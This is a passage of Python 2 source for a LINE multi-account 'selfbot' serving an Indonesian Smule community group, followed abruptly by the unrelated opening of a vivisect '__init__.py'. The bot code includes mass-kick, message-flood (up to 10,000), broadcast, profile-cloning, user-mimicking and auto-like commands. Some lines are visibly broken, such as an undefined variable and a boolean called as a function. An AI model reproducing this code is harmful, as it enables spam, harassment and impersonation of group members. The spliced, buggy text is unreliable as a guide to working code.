kc.sendText(msg.to,"Sukses update")
else:
kc.sendText(msg.to,"Aktifkan jam terlebih dulu")
#-------------Fungsi Jam Update Finish-------------------#
elif msg.text == "@cctv":
if msg.from_ in admin:
cl.sendText(msg.to, "SIDER")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%Y-%m-%d %H:%M')
wait2['ROM'][msg.to] = {}
print wait2
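# Note (editor): sketch of the read-tracking state used by "@cctv" / "@nongol"; the key names
# are taken from the code above, and the sample values are illustrative only.
#   wait2['readPoint'][msg.to]  -> id of the message that opens the tracking window
#   wait2['readMember'][msg.to] -> newline-separated display names collected so far (string)
#   wait2['ROM'][msg.to]        -> dict of reader mid -> "╠<displayName>" (filled by the op.type == 55 handler)
#   wait2['setTime'][msg.to]    -> "YYYY-MM-DD HH:MM" timestamp of when tracking started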
elif msg.text == "@nongol":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "╔═════ON SIDER══════%s\n╠════════════════\n%s╠════════════════\n║Reading point creation:\n║ [%s]\n╚════════════════" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "aku lelah")
#-----------------------------------------------
#-----------------------------------------------
#----------------Fungsi Join Group Start-----------------------#
elif msg.text in ["@all join","@semua masuk","@pus"]:
if msg.from_ in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
# ks.acceptGroupInvitationByTicket(msg.to,Ticket)
# time.sleep(0.2)
# ka.acceptGroupInvitationByTicket(msg.to,Ticket)
# time.sleep(0.2)
# kb.acceptGroupInvitationByTicket(msg.to,Ticket)
# time.sleep(0.2)
# ko.acceptGroupInvitationByTicket(msg.to,Ticket)
# time.sleep(0.2)
# ke.acceptGroupInvitationByTicket(msg.to,Ticket)
# time.sleep(0.2)
# ku.acceptGroupInvitationByTicket(msg.to,Ticket)
# time.sleep(0.2)
# G = cl.getGroup(msg.to)
# G.preventJoinByTicket = True
# cl.updateGroup(G)
print "Bot Complete"
G.preventJoinByTicket(G)
cl.updateGroup(G)
elif msg.text in ["@ZSI join"]:
if msg.from_ in admin:
x = ki.getGroup(msg.to)
x.preventJoinByTicket = False
ki.updateGroup(x)
invsend = 0
Ti = ki.reissueGroupTicket(msg.to)
cl.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(msg.to)
elif msg.text in ["@ZSI2 join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["@ZSI3 join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["@ZSI4 join"]:
if msg.from_ in admin:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
#----------------------Fungsi Join Group Finish---------------#
#-------------Fungsi Leave Group Start---------------#
elif msg.text in ["@Bye all"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
except:
pass
elif msg.text in ["@Bye2"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["@Bye3"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["@Bye4"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bot2 @bye"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bot3 @bye"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bot4 @bye"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
#-------------Fungsi Leave Group Finish---------------#
#-------------Fungsi Tag All Start---------------#
elif msg.text in ["Tagall","kiwkiw","Kiwkiw","tagall"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
cb = ""
cb2 = ""
strt = int(0)
akh = int(0)
for md in nama:
akh = akh + int(6)
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + int(7)
akh = akh + 1
cb2 += "@nrik \n"
cb = (cb[:int(len(cb)-1)])
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
#-------------Fungsi Tag All Finish---------------#
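# Note (editor): minimal sketch of the mention payload built by the Tagall handler above,
# assuming the client expects LINE-style MENTION metadata; S/E are the character offsets of
# each "@nrik " placeholder inside msg.text, and the mids shown are placeholders.
#   msg.contentMetadata = {
#       'MENTION': '{"MENTIONEES":[{"S":"0","E":"6","M":"<mid1>"},{"S":"7","E":"13","M":"<mid2>"}]}',
#       'EMTVER': '4'
#   }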
#----------------Fungsi Banned Kick Target Start-----------------------#
elif msg.text in ["@Kill "]:
if msg.from_ in admin:
if msg.toType == 2:
group = ki.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
kk.sendText(msg.to,"Good Bye")
return
for jj in matched_list:
try:
klist=[ki,kk,kc]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#----------------Fungsi Banned Kick Target Finish----------------------#
elif "@Pembersihan" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Sweep this group","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
ki.sendText(msg.to,"maaf kalo gak sopan")
kk.sendText(msg.to,"makasih semuanya..")
kc.sendText(msg.to,"hehehhehe")
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
ki.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in Bots:
try:
klist=[cl,ki,kk,kc]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
ki.sendText(msg.to,"Group cleanse")
#----------------Fungsi Kick User Target Start----------------------#
elif "Nk " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
if target not in Bots:
try:
klist=[cl,ki,kk,kc]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
ki.sendText(msg.to,"Good bye") #ki.sendText(msg.to,"error")
#----------------Fungsi Banned User Target Start-----------------------#
elif "@Ban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Banned] executed"
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets in Bots:
cl.sendText(msg.to,"Can't ban bot")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target locked.")
print "[Banned] success"
except:
ki.sendText(msg.to,"Target already in blacklist.")
#----------------Fungsi Banned User Target Finish-----------------------#
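# Note (editor): the blacklist written above is persisted in st2__b.json as a plain JSON
# object mapping a user's mid to true (see the json.dump calls); example content:
#   {
#       "u1234567890abcdef1234567890abcdef": true
#   }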
elif msg.text in ["@Reset","@reset"]:
if msg.from_ in admin:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "Telah kembali semula")
except Exception as e:
cl.sendText(msg.to, str(e))
elif "Copy @" in msg.text:
if msg.toType == 2:
print "[Copy] OK"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendMessage(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendMessage(msg.to, "Success Copy profile ~")
except Exception as e:
print e
elif "@a1 copy @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Copy] OK"
_name = msg.text.replace("A1 Copy @","")
_nametarget = _name.rstrip(' ')
gs = ki.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendMessage(msg.to, "Not Found...")
else:
for target in targets:
try:
ki.CloneContactProfile(target)
ki.sendMessage(msg.to, "Success Copy profile ~")
except Exception as e:
print e
#----------------Fungsi Unbanned User Target Start-----------------------#
elif "@Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Unban] executed"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Target not found")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target cleaned.")
print "[Unban] success"
except:
ki.sendText(msg.to,"There's no target in blacklist.")
#----------------Fungsi Unbanned User Target Finish-----------------------#
#-----------------------------------------------
elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
if msg.from_ in admin:
text = msg.text
if text is not None:
cl.sendText(msg.to,text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
cl.sendMessage(msg)
elif msg.contentType == 13:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
cl.sendMessage(msg)
elif "@mimic:" in msg.text:
if msg.from_ in admin:
cmd = msg.text.replace("Mimic:","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
cl.sendText(msg.to,"Mimic on")
else:
cl.sendText(msg.to,"Mimic already on")
if cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
cl.sendText(msg.to,"Mimic off")
else:
cl.sendText(msg.to,"Mimic already off")
elif "add:" in cmd:
target0 = msg.text.replace("Mimic:add:","")
target1 = target0.lstrip()
target2 = target1.replace("@","")
target3 = target2.rstrip()
_name = target3
gInfo = cl.getGroup(msg.to)
targets = []
for a in gInfo.members:
if _name == a.displayName:
targets.append(a.mid)
if targets == []:
cl.sendText(msg.to,"No targets")
else:
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Success added target")
#cl.sendMessageWithMention(msg.to,target)
break
except:
cl.sendText(msg.to,"Failed")
break
elif "del:" in cmd:
target0 = msg.text.replace("Mimic:del:","")
target1 = target0.lstrip()
target2 = target1.replace("@","")
target3 = target2.rstrip()
_name = target3
gInfo = cl.getGroup(msg.to)
targets = []
for a in gInfo.members:
if _name == a.displayName:
targets.append(a.mid)
if targets == []:
cl.sendText(msg.to,"No targets")
else:
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Success deleted target")
#cl.sendMessageWithMention(msg.to,target)
break
except:
cl.sendText(msg.to,"Failed!")
break
elif cmd == "ListTarget":
if mimic["target"] == {}:
cl.sendText(msg.to,"No target")
else:
lst = "<<Lit Target>>"
total = len(mimic["target"])
for a in mimic["target"]:
if mimic["target"][a] == True:
stat = "On"
else:
stat = "Off"
lst += "\n->" + cl.getContact(mi_d).displayName + " | " + stat
cl.sendText(msg.to,lst + "\nTotal:" + total)
#---------------------Fungsi spam start--------------------------
elif "@spam change: " in msg.text:
if msg.from_ in admin:
wait["spam"] = msg.text.replace("Spam change: ","")
cl.sendText(msg.to,"spam changed")
elif "@spam add: " in msg.text:
if msg.from_ in admin:
wait["spam"] = msg.text.replace("Spam add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"spam changed")
else:
cl.sendText(msg.to,"Done")
elif "@Spam: " in msg.text:
if msg.from_ in admin:
strnum = msg.text.replace("Spam: ","")
num = int(strnum)
for var in range(0,num):
cl.sendText(msg.to, wait["spam"])
#-------------------Fungsi spam finish----------------------------
#-----------------------------------------------
elif "@spam " in msg.text:
if msg.from_ in admin:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke cantik <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#------------------------------------------------
#-------------Fungsi Spam Start---------------------#
elif msg.text in ["@Up","@up","@Up Chat","@Up chat","@up chat","@Upchat","@upchat"]:
if msg.from_ in admin:
cl.sendText(msg.to,"squared up!")
ki.sendText(msg.to,"squared up!")
kk.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
ki.sendText(msg.to,"squared up!")
kk.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!������")
ki.sendText(msg.to,"squared up!")
kk.sendText(msg.to,"squared up!")
cl.sendText(msg.to,"squared up!")
ki.sendText(msg.to,"squared up!")
#-------------Fungsi Spam Finish---------------#
#-------------Fungsi Broadcast Start------------#
elif "@Bc " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("@Bc ","")
a = cl.getGroupIdsJoined()
a = ki.getGroupIdsJoined()
a = kk.getGroupIdsJoined()
a = kc.getGroupIdsJoined()
for taf in a:
cl.sendText(taf, (bctxt))
ki.sendText(taf, (bctxt))
kk.sendText(taf, (bctxt))
kc.sendText(taf, (bctxt))
elif "@bc " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("@bc ","")
ki.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
#--------------Fungsi Broadcast Finish-----------#
elif msg.text in ["@list group"]:
if msg.from_ in admin:
gids = cl.getGroupIdsJoined()
h = ""
for i in gids:
h += "[•]%s Member\n" % (cl.getGroup(i).name +"👉"+str(len(cl.getGroup(i).members)))
cl.sendText(msg.to,"=======[List Group]======\n"+ h +"Total Group :"+str(len(gids)))
#####gn = cl.getGroup(i).name
#--------------List Group------------
#--------------Fungsi Broadcast Finish-----------#
elif msg.text in ["ZSIsay hi"]:
if msg.from_ in admin:
ki.sendText(msg.to,"Hi buddy Har Har")
kk.sendText(msg.to,"Hi buddy Har Har")
kc.sendText(msg.to,"Hi buddy Har Har")
#-----------------------------------------------
elif msg.text in ["assalamualaikum","Assalamualaikum","Assalamu 'alaikum","assalamu 'alaikum"]:
ki.sendText(msg.to,"Wa 'alaikum salam")
elif msg.text in ["ZSIsay pagi"]:
if msg.from_ in admin:
ki.sendText(msg.to,"Pagi Semua Har Har")
kk.sendText(msg.to,"Semangat Har Har")
kc.sendText(msg.to,"Jalani Aktifitasnya Har Har")
elif msg.text in ["ZSIsay bobo ah","Bobo dulu ah"]:
if msg.from_ in admin:
ki.sendText(msg.to,"Have a nice dream Har Har")
kk.sendText(msg.to,"Have a nice dream Har Har")
kc.sendText(msg.to,"Have a nice dream Har Har")
elif msg.text in ["#welcome"]:
if msg.from_ in admin:
ki.sendText(msg.to,"Selamat Bergabung di ZONA SMULE INDONESIA")
kk.sendText(msg.to,"Jangan lupa isi BIODATA di NOTE terus masukin SS SMULE nya di Album Smule")
kc.sendText(msg.to,"Jangan lupa absen tiap pagi pakai id smule yaa,, Moga betah!")
cl.sendText(msg.to,"Jangan nakal, ok!")
#-----------------------------------------------
elif msg.text in ["@PING","@Ping","@ping"]:
if msg.from_ in admin:
ki.sendText(msg.to,"PONG double thumbs upHar Har")
kk.sendText(msg.to,"PING double thumbs upHar Har")
kc.sendText(msg.to,"PONG double thumbs upHar Har")
#-----------------------------------------------
#-------------Fungsi Respon Start---------------------#
elif msg.text in ["Respon","respon","Respon Dong","respon dong"]:
if msg.from_ in admin:
cl.sendText(msg.to,"...")
ki.sendText(msg.to,"......")
kk.sendText(msg.to,"..........")
kc.sendText(msg.to,"Complete 100%")
elif msg.text in ["Respon beb"]:
if msg.from_ in admin:
cl.sendText(msg.to,"Bab")
ki.sendText(msg.to,"Beb")
kk.sendText(msg.to,"Gundulmu")
kc.sendText(msg.to,"wkwkwk")
#-------------Fungsi Respon Finish---------------------#
#-------------Fungsi Balesan Respon Start---------------------#
elif msg.text in ["Ini Apa","ini apa","Apaan Ini","apaan ini"]:
ki.sendText(msg.to,"Ya gitu deh intinya mah questioning")
#-------------Fungsi Balesan Respon Finish---------------------#
#-------------Fungsi Speedbot Start---------------------#
elif msg.text in ["@speed","@speedbot"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "▒▒▒▓▓▓LOAD 99%..")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sDetik" % (elapsed_time))
ki.sendText(msg.to, "%sDetik" % (elapsed_time))
kk.sendText(msg.to, "%sDetik" % (elapsed_time))
kc.sendText(msg.to, "%sDetik" % (elapsed_time))
#-------------Fungsi Speedbot Finish---------------------#
# ----------------- BAN MEMBER BY TAG 2TAG ATAU 10TAG MEMBER
elif ("@bl " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned")
except:
pass
#-------------Fungsi Banned Send Contact Start------------------#
elif msg.text in ["@ban"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact")
elif msg.text in ["@unban"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact")
#-------------Fungsi Banned Send Contact Finish------------------#
#-------------Fungsi Bannlist Start------------------#
elif msg.text in ["@banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"There's no banned user")
else:
ki.sendText(msg.to,"Blacklist user")
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Bannlist Finish------------------#
elif msg.text in ["@cek ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif msg.text in ["@kill ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
cl.sendText(msg.to,"Good bye.")
cl.kickoutFromGroup(msg.to,[jj])
ki.kickoutFromGroup(msg.to,[jj])
kk.kickoutFromGroup(msg.to,[jj])
kc.kickoutFromGroup(msg.to,[jj])
elif msg.text in ["@clear"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif "@random: " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
strnum = msg.text.replace("random: ","")
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
try:
num = int(strnum)
group = cl.getGroup(msg.to)
for var in range(0,num):
name = "".join([random.choice(source_str) for x in xrange(10)])
time.sleep(0.01)
group.name = name
cl.updateGroup(group)
except:
cl.sendText(msg.to,"Error")
elif "@albumat'" in msg.text:
if msg.from_ in admin:
try:
albumtags = msg.text.replace("albumat'","")
gid = albumtags[:6]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "created an album")
except:
cl.sendText(msg.to,"Error")
elif "@fakec��1�7�1�7" in msg.text:
if msg.from_ in admin:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
anu = msg.text.replace("fakec��1�7�1�7","")
#cl.sendText(msg.to,str(cl.channel.createAlbum(msg.to,name,anu)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
elif "Admin add @" in msg.text:
if msg.from_ in owner:
print "[Command]Admin add executing"
_name = msg.text.replace("Admin add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"Admin added")
except:
pass
print "[Command]Admin add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "@admin remove @" in msg.text:
if msg.from_ in owner:
print "[Command]Admin remove executing"
_name = msg.text.replace("Admin remove @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Admin deleted")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif msg.text in ["@list admin","@adminlist"]:
if msg.from_ in owner:
if admin == []:
cl.sendText(msg.to,"The admin list is empty")
else:
cl.sendText(msg.to,"Admin List")
mc = ""
for mi_d in admin:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Adminlist executed"
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
#wait2['readMember'][op.param1] += "\n╠" + Name
wait2['ROM'][op.param1][op.param2] = "╠" + Name
else:
pass
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"]
cl.updateProfile(profile)
profile2 = ki.getProfile()
profile2.displayName = wait["cName2"]
ki.updateProfile(profile2)
profile3 = kk.getProfile()
profile3.displayName = wait["cName3"]
kk.updateProfile(profile3)
profile4 = kc.getProfile()
profile4.displayName = wait["cName4"]
kc.updateProfile(profile4)
profile5 = ks.getProfile()
profile5.displayName = wait["cName5"]
ks.updateProfile(profile5)
profile6 = ka.getProfile()
profile6.displayName = wait["cName6"]
ka.updateProfile(profile6)
profile7 = kb.getProfile()
profile7.displayName = wait["cName7"]
kb.updateProfile(profile7)
profile8 = ko.getProfile()
profile8.displayName = wait["cName8"]
ko.updateProfile(profile8)
profile9 = ke.getProfile()
profile9.displayName = wait["cName9"]
ke.updateProfile(profile9)
profile10 = ku.getProfile()
profile10.displayName = wait["cName10"]
ku.updateProfile(profile10)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
def autolike():
for zx in range(0, 20):
hasil = cl.activity(limit=1000)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"@ZSI_TEAM")
ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
print "Like"
except:
pass
else:
print "Already Liked"
time.sleep(500)
thread2 = threading.Thread(target=autolike)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
__init__.py
|
"""
Yay! It's NOT IDA!!!1!!1!one!
"""
import os
import re
import sys
import time
import string
import hashlib
import logging
import binascii
import itertools
import traceback
import threading
import contextlib
import collections
try:
import Queue
except ModuleNotFoundError:
import queue as Queue
# The envi imports...
import envi
import envi.bits as e_bits
import envi.memory as e_mem
import envi.common as e_common
import envi.config as e_config
import envi.bytesig as e_bytesig
import envi.symstore.resolver as e_resolv
import envi.symstore.symcache as e_symcache
import vstruct
import vstruct.cparse as vs_cparse
import vstruct.primitives as vs_prims
import vivisect.base as viv_base
import vivisect.parsers as viv_parsers
import vivisect.codegraph as viv_codegraph
import vivisect.impemu.lookup as viv_imp_lookup
from vivisect.exc import *
from vivisect.const import *
from vivisect.defconfig import *
import vivisect.analysis.generic.emucode as v_emucode
logger = logging.getLogger(__name__)
STOP_LOCS = (LOC_STRING, LOC_UNI, LOC_STRUCT, LOC_CLSID, LOC_VFTABLE, LOC_IMPORT, LOC_PAD, LOC_NUMBER)
def guid(size=16):
return binascii.hexlify(os.urandom(size))
class VivWorkspace(e_mem.MemoryObject, viv_base.VivWorkspaceCore):
'''
VivWorkspace is the heart of vivisect's binary analysis. Most APIs accept a VivWorkspace
as their first parameter, and the workspace is responsible for all the user facing functions
of getters/adders, running analysis passes, making the various locations, loading files, and
more.
Current keyword arguments:
* confdir:
* Type: String (path to directory)
* Description: A path to a directory to save/load vivisect's analysis configuration options (options will be saved to/loaded from the viv.json file in the directory)
* Default: $HOME/.viv/
* autosave (boolean):
* Type: Boolean
* Description: If true, autosave any configuration changes to the <confdir>/viv.json upon changing them.
* Default: False
'''
def __init__(self, **kwargs):
e_mem.MemoryObject.__init__(self)
viv_base.VivWorkspaceCore.__init__(self)
autosave = kwargs.get('autosave', False)
cfgdir = kwargs.get('confdir', None)
if cfgdir:
self.vivhome = os.path.abspath(cfgdir)
else:
self.vivhome = e_config.gethomedir(".viv", makedir=autosave)
self._viv_gui = None # If a gui is running, he will put a ref here...
self.saved = True # TODO: where is this used?
self.rchan = None
self.server = None
self.chanids = itertools.count()
